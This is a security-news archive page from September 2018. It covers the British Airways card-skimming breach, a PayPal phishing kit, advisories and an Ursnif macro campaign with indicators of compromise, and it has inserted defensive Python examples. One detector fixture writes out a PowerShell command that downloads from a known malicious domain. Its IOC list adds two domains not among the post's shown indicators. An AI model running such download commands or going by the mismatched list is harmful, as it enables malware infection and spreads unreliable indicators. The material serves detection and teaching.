Daily Archives: September 6, 2018

Beware of the New Way Crooks Can Drain Your Credit Card Account

This article describes one of the recent frauds used by cybercriminals to steal funds from people’s credit cards. Unfortunately, it is a simple one to pull off, so peruse the details below and make sure you don’t get on the hook.

The malicious logic in a nutshell

The malefactors use a legit remote access tool […]

The post Beware of the New Way Crooks Can Drain Your Credit Card Account appeared first on The State of Security.

NBlog Sept 7 – what have policies ever done for us?

Why do we have policies, procedures and all that jazz? What are they and what are they for? What do they actually achieve? What would happen if we didn't bother at all? What else could we do instead - are there better ways?

Those rhetorical questions were prompted by a disarmingly simple and naive-sounding question on the ISO27k Forum this morning, viz "I am looking at implementing iso27001. How do I know if I need a policy or procedure in place?" 

Good question!

In relation to ISO27k and to information risk and security in general, policies and/or procedures are needed in order to:
  • Address information risks that are of concern to the organization, or more specifically to management and other stakeholders;
  • State or express management's intentions formally in various areas;
  • Communicate and clarify things to the intended readers, giving them clear guidance (e.g. work instructions, awareness and training materials);
  • Satisfy requirements stated explicitly in ISO/IEC 27001 (assuming the organization intends to be certified compliant);
  • Satisfy other relevant and applicable requirements (e.g. under privacy laws and regulations, or for contractual reasons);
  • Promote good practices through a stable, mature, considered, structured and systematic approach, allowing continuous review, updates and improvement where needed;
  • Integrate various approaches in a coherent manner (e.g. information risk and security, plus privacy, plus business continuity, plus compliance, plus physical security, plus .... plus ...);
  • Demonstrate to all concerned (insiders and outsiders) that various issues have been considered and desired approaches have been determined, while generally implying that other possible approaches have been discounted and are not required, perhaps even not approved or authorized;
  • Enable assurance checks and formal compliance enforcement purposes, in which case they need to be unambiguous: clearly written, clearly applicable, clearly mandated ...;
  • Ensure consistency of operations and response; *
  • Allow for reporting and metrication of results; *
  • Stop people guessing or making stuff up on a whim, or at least reduce this in certain areas while giving them more latitude in other areas;
  • Emphasize and focus attention on Stuff That Matters.
* Additional objectives contributed by Anton Aylward - thanks Anton!

As to 'policy' and 'procedure', individuals and organizations quite often interpret those and related terms differently. Dictionary definitions are generally definitive.

ISO/IEC 27000 defines some terms explicitly in the context of the ISO27k standards including:
  • “Documented information” means information required to be controlled and maintained by an organization and the medium on which it is contained [i.e. ‘documentation’ in common parlance];
  • “Policy” means intentions and direction of an organization, as formally expressed by its top management [where organization and top management are also explicitly-defined terms];
  • “Process” means set of interrelated or interacting activities which transforms inputs into outputs [where none of those terms are explicitly defined!].
By the way, "insurance policy" neatly demonstrates a key difficulty in defining words individually, in isolation from the context. An insurance policy is not the "intentions and direction of an organization, as formally expressed by its top management" - it is a legally binding agreement, a contract between the parties concerning the insurance arrangement. "Foreign policy" is different again, and so on. Dictionaries tackle this situation by providing multiple, distinct or related definitions and examples, illustrating the defined terms being used in typical statements. ISO/IEC 27000 backs into a corner by giving just one definition and no context.

To make it worse, several key words and terms (including "key", for one!), are undefined. “Procedure” is not explicitly defined … but is used throughout ISO27k including 27000 itself where “processes and procedures” suggests they are distinct, and “policies, procedures and practices” implies further [also undefined] distinctions.

“Procedure” to me means the description of a “process” which is generally a sequence of “activities” which may be “tasks” or “decisions” or something else (e.g. “Wait patiently for authorization”). The manner of their description may be step-by-step instructions, flow diagrams, demonstrations, notes or some other format, usually captured in some form so that it can be more easily and consistently specified, stored, standardized, reviewed and authorized, communicated/used, and improved.

I have my own personal documentation preferences and styles. Given the choice, I prefer clear at-a-glance diagrams over tedious paragraphs of text for procedures, although both and more may be needed. For corporate policies, I much prefer readable plain English over the curious pseudo-legal mumbo-jumbo that is depressingly common in practice. But then IANAL: I'm a technical author writing information risk and security policies, procedures, training guides and awareness materials for ordinary people.

If a client uses different terms or interpretations, has particular requirements such as specific documentation formats and styles, needs their mumbo to be jumbo or whatever, that’s fine by me. He who pays the piper calls the tune!  

British Airways Customer Data Stolen in Website and Mobile App Hack

In a statement, British Airways stated: "From 22:58 BST August 21 2018 until 21:45 BST September 5 2018 inclusive, the personal and financial details of customers making bookings on ba.com and the airline’s app were compromised." The airline said it will be notifying affected customers, and that anyone who has been impacted should contact their bank or credit card provider.

The Telegraph reported that 380,000 payments were compromised, and that BA customers had experienced payment card fraud as a result before the BA breach disclosure, which strongly suggests unencrypted debit/credit card details were stolen.

There are no details about the data theft method at the moment, but given the statement said the BA website and BA mobile app were compromised, I think we could be looking at another example of an insecure API being exploited, as with the Air Canada breach and the T-Mobile breach last month.

We'll see what comes out in the wash over the next few days and weeks, but thanks to the GDPR, at least UK firms are quickly notifying their customers when their personal and financial data has been compromised, even if there is little detail reported about how. Without knowing how the data was compromised, customers cannot be truly assured their private data is safe. It also will be interesting to learn whether the BA systems were compliant with the Payment Card Industry Data Security Standard (PCI DSS), required by all organisations that accept, process, store and/or transmit debit and credit cards.

Update: 
A spokesperson at BA said "hackers carried out a sophisticated, malicious criminal attack on its website" and impacted BA customers would be compensated. 

380,000 card payment transactions were confirmed as stolen, specifically:
  • Full Name
  • Email address
  • Payment card number (PAN)
  • Expiration date
  • Card Security Code [CVV] - typically a 3-digit authorisation code printed on the back of the debit/credit card
BA insists it did not store the CVV numbers; these are not allowed to be stored after payment card authorisation under PCI DSS. This suggests the card details may have been intercepted during the payment transaction, perhaps by a maliciously injected or compromised third-party website plugin, as opposed to data theft from the database, as is often seen with SQL injection attacks against web apps.

BA have published help and FAQs to anyone that is impacted by this data breach.
https://www.britishairways.com/en-gb/information/incident/data-theft/latest-information

British Airways is owned by IAG, whose share price dropped by more than 4%, which equates to a £500m+ loss in the company's value.

Update on the Attack Method (11 Sept 2018)
In a blog post, RiskIQ researchers claim to have found evidence that a web-based card skimmer script was injected into the BA website, very similar to the approach used by the Magecart group, who are believed to be behind a similar recent attack against the Ticketmaster website. Web-based card skimmer script attacks have been occurring since 2015.

In this case, once the customer entered their payment card details and submitted the payment, either on a PC or on a touchscreen device, the malicious script captured their data and sent it to a virtual private server (VPS) hosted in Romania. The server used the domain baways.com and had a TLS (https) certificate issued by Comodo to make it look legit. The domain was registered 6 days before the breach started; this obviously went undetected by BA's security, though such a rogue domain registration could perhaps have been picked up by a threat intelligence service.
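The "rogue domain registration could have been picked up" point above is the kind of check a threat intelligence feed actually runs: compare every newly registered domain against a brand profile and surface the ones that look like the brand. The following is an added example, not code from the original post or from any vendor. It assumes a hypothetical feed of recent registrations (constructed inline) and a brand profile built from the two domains the post names, ba.com and britishairways.com; the three heuristics (typosquat by edit distance, brand token embedded in the label, and abbreviation-plus-fragment composition, which is how baways relates to "ba" and "airways") are ordinary string checks.

```python
"""Triage of newly registered domains that resemble a brand's own domains.

Added example, not code from the original post or from any threat-intelligence
vendor. The feed of newly registered domains below is constructed; the brand
profile uses the two domains the post names (ba.com, britishairways.com).
"""
from typing import Dict, List, Optional

# Brand profile: registrable labels (the part before the TLD) and the word tokens
# they are built from. Tokens let us catch "ba" + "ways" style compositions.
BRAND_LABELS = ["ba", "britishairways"]
BRAND_TOKENS = ["british", "airways", "ba"]
MAX_AGE_DAYS = 30  # assumption: only registrations this recent are worth a look


def levenshtein(a: str, b: str) -> int:
    """Edit distance with insert, delete and substitute, each costing 1."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def registrable_label(domain: str) -> str:
    """Label left of the TLD, lower-cased: 'BAways.com' -> 'baways'."""
    parts = domain.lower().strip(".").split(".")
    return parts[-2] if len(parts) >= 2 else parts[0]


def brand_composition(label: str) -> bool:
    """True when label = <brand token> + <fragment (3+ chars) of another brand token>,
    which is how 'baways' relates to 'ba' and 'airways'."""
    for tok in BRAND_TOKENS:
        if label.startswith(tok) and len(label) > len(tok):
            rest = label[len(tok):]
            if len(rest) >= 3 and any(rest in other for other in BRAND_TOKENS if other != tok):
                return True
    return False


def classify(domain: str) -> Optional[str]:
    """Return a reason string when the domain resembles the brand, else None."""
    label = registrable_label(domain)
    if label in BRAND_LABELS:
        return None  # the brand's own domain
    # 1. Typosquat: within two edits of a long brand label (short labels like 'ba' are skipped).
    for ref in BRAND_LABELS:
        if len(ref) >= 6 and levenshtein(label, ref) <= 2:
            return "typosquat"
    # 2. Brand embedding: a distinctive brand token appears inside the label.
    if any(len(tok) >= 5 and tok in label for tok in BRAND_TOKENS):
        return "brand-embedding"
    # 3. Brand composition: abbreviation plus a fragment of another token.
    if brand_composition(label):
        return "brand-composition"
    return None


def triage(feed: List[Dict[str, object]]) -> List[Dict[str, object]]:
    """Flag recent registrations that resemble the brand, keeping feed order."""
    flagged = []
    for entry in feed:
        age = int(entry["registered_days_ago"])
        if age > MAX_AGE_DAYS:
            continue
        reason = classify(str(entry["domain"]))
        if reason:
            flagged.append({"domain": entry["domain"], "reason": reason, "registered_days_ago": age})
    return flagged


# Constructed sample feed (not real registration data).
SAMPLE_FEED = [
    {"domain": "baways.com", "registered_days_ago": 6},
    {"domain": "britishairway.com", "registered_days_ago": 3},
    {"domain": "airways-support.net", "registered_days_ago": 12},
    {"domain": "bank-of-somewhere.com", "registered_days_ago": 2},
    {"domain": "ba.com", "registered_days_ago": 9000},
    {"domain": "britishairways-login.com", "registered_days_ago": 90},
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_FEED):
        print(f"{hit['domain']:<28} {hit['reason']:<18} registered {hit['registered_days_ago']}d ago")
```

The heuristics deliberately over-flag (a label such as "british-museum" would trip the embedding rule), because the output is a triage queue for an analyst, not a blocking decision; the registration-age filter and the reason string are what keep that queue short and explainable.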

Researchers have also claimed the BA website wasn't PCI DSS compliant. They found 7 scripts running on the BA website, but crucially said the BA payment page wasn't isolating the card payment fields within an iframe, which would prevent third-party scripts (and XSS attacks) from being able to read the payment card form fields.

Bill Conner, CEO SonicWall said "Organizations and government entities carry a responsibility to consumers and civilians alike to guard their most valuable information at all cost. While the British Airways breach may not have been as detrimental as I’m sure its culprits would have liked it to be, it should serve as a wake-up call to CTOs, CIOs and CISOs. The fact is, it is early days, and the true damage done is yet to be seen. Personal information that does not change as easily as a credit card or bank account number drive a high price on the Dark Web. This kind of Personally Identifiable Information is highly sought after by cybercriminals for monetary gain. Companies should be implementing security best practices such as a layered approach to protection, as well as proactively updating any out of date security devices, as a matter of course."

Opinion: The Corporate Lessons of Election Hacks

Recent demonstrations of election hacks are about more than ballots. They also contain important lessons for enterprises,  Security Ledger Editor in Chief Paul Roberts argues in this opinion piece. (Note: this post first appeared on Hitachi Systems Security* web site.) Did an 11 year old hack a state election website? Are voting machines easy...


VMware Releases Security Updates

Original release date: September 06, 2018

VMware has released security updates to address vulnerabilities in VMware AirWatch Agent and Content Locker. An attacker could exploit these vulnerabilities to obtain access to sensitive information.

NCCIC encourages users and administrators to review the VMware Security Advisory VMSA-2018-0023 and apply the necessary updates.

Inside the Phish: How a Phishing Campaign Really Works

Even with all of the hacks and third party breaches that have plagued some of the biggest global corporations over the past few years, phishing still remains one of the most frequent ways into an organization. It has been reported that up to 93% of all breaches start with a phish.

LookingGlass has broad and deep access to phishing data and insight into phishing campaign techniques for catching phish. We hope that in sharing the “behind-the-scenes” of a phishing attack, your organization can be more prepared to defend against this recurring digital risk.

Year-to-date we have observed the following as some of the top phishing “targets” or brands used as bait:

  • Wells Fargo
  • Microsoft
  • PayPal
  • Dropbox
  • Google

None of these should come as a surprise, as they are all well-known brands with expansive customer bases, and attackers typically cast a wide net in an effort to reach as many victims as possible. For example, if an attacker wants to infiltrate a corporate environment they can make a fairly educated guess that the likelihood of that business using a service such as Microsoft 365 is quite high. Thanks to widely available dumps of email addresses and account information, the attacker just needs to collect a list of email addresses associated with the business, craft their strategically themed phishing email, and then wait for the clicks to commence – and they will most certainly commence.

A common theme we have observed in association with these targets is login pages designed to harvest user credentials. In August, we took a look at a phishing campaign that targeted PayPal. In this instance, the phishing link was hosted on a WordPress site of an apparent victim domain, where the domain owner most likely had no idea that they were serving up malicious content on their site. A visit to the site’s home page revealed a very unobtrusive comment indicating that the site had been “Hacked by Virus-ma” (figure 1):

Figure 1. Virus Ma

Some quick research revealed Virus-ma had at least one hacking-related YouTube video channel.

When a user visits the phishing page via the phishing link, they are presented with an extremely realistic PayPal spoof (figure 2):

Figure 2. PayPal login page

Regardless of what credentials the user enters (we obviously did not use legit PayPal credentials in our testing), they will be accepted and the user is directed to the next screen which requests contact information. The screen following that asks for credit card information, social security number, and account number (figure 3):

Figure 3. Update Your Credit/Debit Card

The credit card data is checked in real time, so incorrect or false entries are instantly rejected. Our research did not go beyond this screen as we were not willing to provide legitimate user financial information that could be verified. Also, it is noteworthy that the website is encrypted, which gives a false sense of security to the user, ultimately making them more likely to provide confidential and sensitive information. In this case, the domain used a TLS certificate signed by cPanel (figure 4):

Figure 4. Certificate

The page source behind these pages revealed some interesting data about the attacker, in which they identify themselves and out the page as being a “scam page” (figure 5):

Figure 5. Phishing log

At LookingGlass Cyber we see hundreds of phishing attacks like these every day. Trying to prevent them is a daunting task, but with an understanding of the processes behind the phish, organizations can better educate their users about what to avoid as well as put appropriate detection methods in place.

The post Inside the Phish: How a Phishing Campaign Really Works appeared first on LookingGlass Cyber Solutions Inc.

British Airways website hack exposed customer financial data

While we've gotten used to regular data breaches, it's been a while since news of one hit the airline industry. But customers who booked flights on British Airways' website or app between 22:58 BST on August 21st and 21:45 BST on September 5th had their personal and financial data compromised due to a cybersecurity breach. The company's post announcing the event unwaveringly stated that anyone who made a booking in that time frame had their information stolen.

Via: BNO News

IDG Contributor Network: Why data loss prevention is a throwback technology

Black Hat 2018 may be behind us, but the trends, conversations and news coming out of the show are still top of mind. The conference was buzzing with cutting-edge topics, from election hacking to “whack-a-mole” security (as dubbed by Parisa Tabriz, director of engineering at Google).

For me, Black Hat is a time to connect with customers, prospects, partners, colleagues and friends to discuss the latest in insider threat management. Typically, during conference season, I come away with a few key takeaways (and free swag) that inform decisions I make for the strategy and management of the organization I run. This year proved to be no different.

Self-driving cars, election hacking and more

Black Hat is one of the top conferences for security professionals to learn about the latest technologies and vulnerabilities to be aware of in the coming year. From the surprising safety of self-driving cars, to new ways to hack into what many thought were secure systems, Black Hat is the spot for the latest innovations, hacking methods and more.

Cisco Network Services Orchestrator Network Plug and Play Information Disclosure Vulnerability

A vulnerability in the Cisco Network Plug and Play server component of Cisco Network Services Orchestrator (NSO) could allow an unauthenticated, remote attacker to gain unauthorized access to configuration data that is stored on an affected NSO system.

The vulnerability exists because the Network Plug and Play component performs incomplete validation when configured to use secure unique device identifiers (SUDI) for authentication. An attacker who controls a Cisco device that supports SUDI authentication and has connectivity to an affected NSO system could exploit this vulnerability. The attacker would need to leverage information about the devices that are being registered on the NSO server to send crafted Cisco Network Plug and Play authentication packets to an affected system. A successful exploit could allow the attacker to gain unauthorized access to configuration data for devices that will be managed by the NSO system.

There are no workarounds that address this vulnerability.

This advisory is available at the following link:
https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180905-nso-infodis

Security Impact Rating: Medium
CVE: CVE-2018-0463

Small businesses targeted by highly localized Ursnif campaign

Cyber thieves are continuously looking for new ways to get people to click on a bad link, open a malicious file, or install a poisoned update in order to steal valuable data. In the past, they cast as wide a net as possible to increase the pool of potential victims. But attacks that create a lot of noise are often easier to spot and stop. Cyber thieves are catching on that we are watching them, so they are trying something different. Now we're seeing a growing trend of small-scale, localized attacks that use specially crafted social engineering to stay under the radar and compromise more victims.

In social engineering attacks, is less really more?

A new malware campaign puts that to the test by targeting home users and small businesses in specific US cities. This was a focused, highly localized attack that aimed to steal sensitive info from just under 200 targets. Macro-laced documents masqueraded as statements from legitimate businesses. The documents are then distributed via email to target victims in cities where the businesses are located.

With Windows Defender AV's next-gen defense, however, the size of the attack doesn't really matter.

Several cloud-based machine learning algorithms detected and blocked the malicious documents at the onset, stopping the attack and protecting customers from what would have been the payload, info-stealing malware Ursnif.

The map below shows the location of the targets.

Figure 1. Geographic distribution of target victims

Highly localized social engineering attack

Here's how the attack played out: Malicious, macro-enabled documents were delivered as email attachments to target small businesses and users. Each document had a file name that spoofed a legitimate business name and masqueraded as a statement from that business. In total, we saw 21 unique document file names used in this campaign.

The attackers sent these emails to intended victims in the city or general geographic area where the businesses are located. For example, the attachment named Dolan_Care_Statement.doc was sent almost exclusively to targets in Missouri. The document file name spoofs a known establishment in St. Louis. While we do not believe the establishment itself was affected or targeted by this attack, the document purports to be from that establishment when it's really not.

The intended effect is for recipients to receive documents from local, very familiar businesses or service providers. It's part of the social engineering scheme to increase the likelihood that recipients will think the document is legitimate and take the bait, when in reality it is a malicious document.

Most common lure document file names   Top target cities
Dockery_FloorCovering_Statement        Johnson City, TN; Kingsport, TN; Knoxville, TN
Dolan_Care_Statement                   St. Louis, MO; Chesterfield, MO; Lees Summit, MO
DMS_Statement                          Omaha, NE; Wynot, NE; Norwalk, OH
Dmo_Statement                          New Braunfels, TX; Seguin, TX; San Antonio, TX
DJACC_Statement                        Miami, FL; Flagler Beach, FL; Niles, MI
Donovan_Construction_Statement         Alexandria, VA; Mclean, VA; Manassas, VA

Table 1. Top target cities of most common document file names

When recipients open the document, they are shown a message that tricks the person into enabling the macro.

Figure 2. Document tricks victim into enabling the macro

As is typical in social engineering attacks, this is not true. If the recipient does enable the macro, no content is shown. Instead the following process is launched to deobfuscate a PowerShell command.

Figure 3. Process to deobfuscate PowerShell

Figure 4. PowerShell command

The PowerShell script connects to any of 12 different URLs that all deliver the payload.

Figure 5. Deobfuscated PowerShell command

The payload is Ursnif, info-stealing malware. When run, Ursnif steals information about infected devices, as well as sensitive information like passwords. Notably, this infection sequence (i.e., cmd.exe process deobfuscates a PowerShell that in turn downloads the payload) is a common method used by other info-stealing malware like Emotet and Trickbot.
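The infection sequence just described (Office document launches cmd.exe, which deobfuscates a PowerShell command that downloads the payload) is something a SOC can look for in process-creation telemetry independently of any antivirus verdict. The following is an added example, not Microsoft's detection logic or Windows Defender ATP's rules. It runs three checks over a handful of constructed process-creation events (a hypothetical endpoint log, not real telemetry): the Office-to-cmd-to-PowerShell ancestry, a download primitive in the PowerShell command line, and a payload host that matches the URLs in the post's IOC list. The hashes and URLs are taken from the post's IOC section and refanged only for string comparison; the `<obfuscated launcher>` placeholder stands in for the cmd.exe command line, which the post does not reproduce.

```python
"""Detect the macro-document -> cmd.exe -> PowerShell -> download chain and match IOCs.

Added example, not Microsoft's detection logic. The process-creation events are
constructed; the hashes and URLs are the IOCs listed in the post, refanged here
only so they can be compared with what appears in a command line.
"""
import re
from typing import Dict, List, Set

# IOCs from the post (defanged as published).
IOC_URLS = [
    "hxxp://vezopilan[.]com/tst/index[.]php?l=soho6[.]tkn",
    "hxxp://cimoselin[.]com/tst/index[.]php?l=soho2[.]tkn",
    "hxxp://vedoriska[.]com/tst/index[.]php?l=soho6[.]tkn",
    "hxxp://baberonto[.]com/tst/index[.]php?l=soho3[.]tkn",
]
IOC_HASHES = {
    # infector documents
    "407a6c99581f428634f9d3b9ec4b79f79c29c79fdea5ea5e97ab3d280b2481a1",
    "77bee1e5c383733efe9d79173ac1de83e8accabe0f2c2408ed3ffa561d46ffd7",
    # Ursnif payload
    "31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f",
    "bd23a2eec4f94c07f4083455f022e4d58de0c2863fa6fa19d8f65bfe16fa19aa",
}


def refang(ioc: str) -> str:
    """Undo the hxxp / [.] defanging so the value can be matched."""
    return ioc.replace("hxxp", "http").replace("[.]", ".")


IOC_DOMAINS: Set[str] = {refang(u).split("/")[2].lower() for u in IOC_URLS}

OFFICE_IMAGES = {"winword.exe", "excel.exe", "powerpnt.exe"}
DOWNLOAD_CUE = re.compile(r"DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|Start-BitsTransfer", re.I)
URL_HOST = re.compile(r"https?://([^/\s'\"]+)", re.I)

Event = Dict[str, object]

# Constructed process-creation events: pid, ppid, image name, command line.
EVENTS: List[Event] = [
    {"pid": 100, "ppid": 1, "image": "explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 200, "ppid": 100, "image": "WINWORD.EXE",
     "cmdline": 'WINWORD.EXE /n "C:\\Users\\demo\\Downloads\\Dolan_Care_Statement.doc"'},
    {"pid": 300, "ppid": 200, "image": "cmd.exe", "cmdline": "cmd.exe /c <obfuscated launcher>"},
    {"pid": 400, "ppid": 300, "image": "powershell.exe",
     "cmdline": "powershell.exe -NoProfile -Command \"(New-Object Net.WebClient)"
                ".DownloadString('http://vezopilan.com/tst/index.php?l=soho6.tkn')\""},
    # Benign administrative use of PowerShell from an interactive shell.
    {"pid": 500, "ppid": 100, "image": "cmd.exe", "cmdline": "cmd.exe"},
    {"pid": 600, "ppid": 500, "image": "powershell.exe", "cmdline": "powershell.exe -Command Get-Date"},
]


def ancestry(event: Event, by_pid: Dict[int, Event], limit: int = 8) -> List[str]:
    """Image names from the event up through its parents: ['powershell.exe', 'cmd.exe', ...]."""
    chain = [event]
    while len(chain) < limit and chain[-1]["ppid"] in by_pid:
        chain.append(by_pid[chain[-1]["ppid"]])
    return [str(e["image"]).lower() for e in chain]


def detect(events: List[Event]) -> List[Dict[str, object]]:
    """Return one alert per PowerShell process that matches any of the three checks."""
    by_pid = {int(e["pid"]): e for e in events}
    alerts = []
    for e in events:
        if str(e["image"]).lower() != "powershell.exe":
            continue
        images = ancestry(e, by_pid)
        cmdline = str(e["cmdline"])
        reasons = []
        # 1. The chain described in the post: Office document -> cmd.exe -> powershell.exe.
        if len(images) >= 3 and images[1] == "cmd.exe" and images[2] in OFFICE_IMAGES:
            reasons.append("office->cmd->powershell chain")
        # 2. A download primitive in the command line.
        if DOWNLOAD_CUE.search(cmdline):
            reasons.append("download cue in command line")
        # 3. A known payload host in the command line.
        hits = {h.lower() for h in URL_HOST.findall(cmdline)} & IOC_DOMAINS
        if hits:
            reasons.append("IOC domain: " + ", ".join(sorted(hits)))
        if reasons:
            alerts.append({"pid": e["pid"], "chain": " <- ".join(images), "reasons": reasons})
    return alerts


def match_hashes(observed: Set[str]) -> Set[str]:
    """Intersect file hashes seen on an endpoint with the published IOC hashes."""
    return {h.lower() for h in observed} & IOC_HASHES


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert["pid"], alert["chain"], alert["reasons"])
```

The ancestry check is the durable part of this rule: the payload hosts and file hashes rotate between campaigns (the post itself lists 12 URLs across several domains), but an Office process spawning cmd.exe which spawns PowerShell is rare in ordinary business use, which is also why the attack surface reduction rules mentioned later in the post block this campaign.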

How machine learning stopped this small-scale, localized attack

As the malware campaign got under way, four different cloud-based machine learning models gave the verdict that the documents were malicious. These four models are among a diverse set of models that help ensure we catch a wide range of new and emerging threats. Different models have different areas of expertise; they use different algorithms and are trained on their unique set of features.

One of the models that gave the malicious verdict is a generic model designed to detect non-portable executable (PE) threats. We have found that models like this are effective in catching social engineering attacks, which typically use non-PE files like scripts and, as is the case for this campaign, macro-laced documents.

The said non-PE model is a simple averaged perceptron algorithm that uses various features, including expert features, fuzzy hashes of various file sections, and contextual data. The simplicity of the model makes it fast, enabling it to give split-second verdicts before suspicious files can execute. Our analysis of this specific model showed that the expert features and fuzzy hashes had the biggest impact on the model's verdict and the eventual blocking of the attack.

Figure 6. Impact of features used by one ML model that detected the attack
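The paragraph above names the model (an averaged perceptron) and its feature families (expert features, fuzzy hashes of file sections, contextual data) without showing how such a model is trained or why it is fast enough for a pre-execution verdict. The following is an added example, not Microsoft's model, features or training data: a minimal averaged perceptron over sparse named features, trained on a handful of constructed document feature vectors, with a per-family weight summary in the spirit of Figure 6. The feature names (`expert:autoopen_macro`, `fuzzy:section_bucket_17` and so on) and the training set are invented for illustration.

```python
"""Averaged perceptron over sparse named features, as a stand-in for the post's non-PE model.

Added example, not Microsoft's model or data. Feature names and the training set
below are constructed; labels are +1 (malicious) and -1 (benign).
"""
from typing import Dict, List, Tuple

Features = Dict[str, float]


class AveragedPerceptron:
    """Binary averaged perceptron: scoring is one sparse dot product, so verdicts are cheap."""

    def __init__(self) -> None:
        self.w: Dict[str, float] = {}        # current weights during training
        self._totals: Dict[str, float] = {}  # accumulated weight * number of steps it was in effect
        self._set_at: Dict[str, int] = {}    # step at which w[f] was last changed
        self.t = 0                           # training steps seen
        self.avg: Dict[str, float] = {}      # averaged weights used for prediction

    @staticmethod
    def _with_bias(feats: Features) -> Features:
        return {**feats, "bias": 1.0}

    def _score(self, feats: Features, weights: Dict[str, float]) -> float:
        return sum(weights.get(f, 0.0) * v for f, v in self._with_bias(feats).items())

    def _update(self, f: str, delta: float) -> None:
        # Bank the old weight for the steps it was in effect (lazy averaging), then change it.
        held = self.t - self._set_at.get(f, 0)
        self._totals[f] = self._totals.get(f, 0.0) + held * self.w.get(f, 0.0)
        self._set_at[f] = self.t
        self.w[f] = self.w.get(f, 0.0) + delta

    def train(self, data: List[Tuple[Features, int]], epochs: int = 3) -> None:
        for _ in range(epochs):
            for feats, y in data:
                self.t += 1
                guess = 1 if self._score(feats, self.w) > 0 else -1
                if guess != y:  # classic perceptron step: move weights toward the true label
                    for f, v in self._with_bias(feats).items():
                        self._update(f, y * v)
        # Each weight counts for every step from its last change through the final step.
        self.avg = {
            f: (self._totals.get(f, 0.0) + (self.t - self._set_at[f] + 1) * w) / self.t
            for f, w in self.w.items()
        }

    def predict(self, feats: Features) -> int:
        return 1 if self._score(feats, self.avg) > 0 else -1

    def feature_impact(self) -> Dict[str, float]:
        """Sum of |averaged weight| per feature family (the prefix before ':'), bias excluded."""
        impact: Dict[str, float] = {}
        for f, w in self.avg.items():
            if f == "bias":
                continue
            family = f.split(":")[0]
            impact[family] = impact.get(family, 0.0) + abs(w)
        return impact


# Constructed training set: expert features, fuzzy-hash buckets of file sections, context.
TRAINING_DATA: List[Tuple[Features, int]] = [
    ({"expert:autoopen_macro": 1, "expert:shell_launch": 1, "fuzzy:section_bucket_17": 1,
      "context:from_mail_attachment": 1}, 1),
    ({"fuzzy:section_bucket_03": 1, "context:signed_publisher": 1}, -1),
    ({"expert:autoopen_macro": 1, "expert:shell_launch": 1, "fuzzy:section_bucket_17": 1}, 1),
    ({"expert:autoopen_macro": 1, "fuzzy:section_bucket_03": 1, "context:signed_publisher": 1}, -1),
    ({"expert:autoopen_macro": 1, "expert:shell_launch": 1, "fuzzy:section_bucket_42": 1,
      "context:from_mail_attachment": 1}, 1),
    ({"fuzzy:section_bucket_08": 1, "context:from_mail_attachment": 1}, -1),
]


def train_demo(epochs: int = 3) -> AveragedPerceptron:
    model = AveragedPerceptron()
    model.train(TRAINING_DATA, epochs=epochs)
    return model


if __name__ == "__main__":
    m = train_demo()
    print("impact by feature family:", m.feature_impact())
    print("verdict:", m.predict({"expert:autoopen_macro": 1, "expert:shell_launch": 1,
                                 "fuzzy:section_bucket_99": 1}))
```

Averaging the weights over every training step, rather than keeping only the final vector, is what makes this variant stable on the small, noisy updates a streaming detection pipeline produces; at prediction time it is still a single sparse dot product, which is the speed property the post relies on for pre-execution verdicts.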

Next-generation protection against malware campaigns regardless of size

Machine learning and artificial intelligence power Windows Defender Antivirus to detect and stop new and emerging attacks before they can wreak havoc. Every day, we protect customers from millions of distinct, first-seen malware. Our layered approach to intelligent, cloud-based protection employs a diverse set of machine learning models designed to catch the wide range of threats: from massive malware campaigns to small-scale, localized attacks.

The latter is a growing trend, and we continue to watch the threat landscape to keep machine learning effective against attacks. In a recent blog post, we discussed how we continue to harden machine learning defenses.

Windows Defender AV delivers the next-gen protection capabilities in Windows Defender Advanced Threat Protection (Windows Defender ATP). Windows Defender ATP integrates attack surface reduction, next-gen protection, endpoint detection and response (EDR), automatic investigation and response, security posture, and advanced hunting capabilities.

Because of this integration, antivirus detections, such as those related to this campaign, are surfaced in Windows Defender Security Center. Using EDR capabilities, security operations teams can then investigate and respond to the incident. Attack surface reduction rules also block this campaign, and these detections are likewise surfaced in Windows Defender ATP. To test how Windows Defender ATP can help your organization detect, investigate, and respond to advanced attacks, sign up for a free trial.

Across the whole Microsoft 365 threat protection, detections and other security signals are shared among Office 365 ATP, Windows Defender ATP, and Azure ATP. In this Ursnif campaign, the antivirus detection also enables the blocking of related emails in Office 365. This demonstrates how signal sharing and orchestration of remediation across solutions in Microsoft 365 results in better integrated threat protection.

Bhavna Soman
Windows Defender Research

Indicators of compromise (IOCs)

Infector:

Hashes
407a6c99581f428634f9d3b9ec4b79f79c29c79fdea5ea5e97ab3d280b2481a1
77bee1e5c383733efe9d79173ac1de83e8accabe0f2c2408ed3ffa561d46ffd7
e9426252473c88d6a6c5031fef610a803bce3090b868d9a29a38ce6fa5a4800a
f8de4ebcfb8aa7c7b84841efd9a5bcd0935c8c3ee8acf910b3f096a5e8039b1f

File names
CSC_Statement.doc
DBC_Statement.doc
DDG_Statement.doc
DJACC_Statement.doc
DKDS_Statement.doc
DMII_Statement.doc
dmo_statement.doc
DMS_Statement.doc
Dockery_Floorcovering_Statement.doc
Docktail_Bar_Statement.doc
doe_statement.doc
Dolan_Care_Statement.doc
Donovan_Construction_Statement.doc
Donovan_Engineering_Statement.doc
DSD_Statement.doc
dsh_statement.doc
realty_group_statement.doc
statement.doc
tri-lakes_motors_statement.doc
TSC_Statement.doc
UCP_Statement.doc

Payload (Ursnif)

Hashes
31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f
bd23a2eec4f94c07f4083455f022e4d58de0c2863fa6fa19d8f65bfe16fa19aa
75f31c9015e0f03f24808dca12dd90f4dfbbbd7e0a5626971c4056a07ea1b2b9
070d70d39f310d7b8842f645d3ba2d44b2f6a3d7347a95b3a47d34c8e955885d
15743d098267ce48e934ed0910bc299292754d02432ea775957c631170778d71

URLs
hxxp://vezopilan[.]com/tst/index[.]php?l=soho6[.]tkn
hxxp://cimoselin[.]com/tst/index[.]php?l=soho2[.]tkn
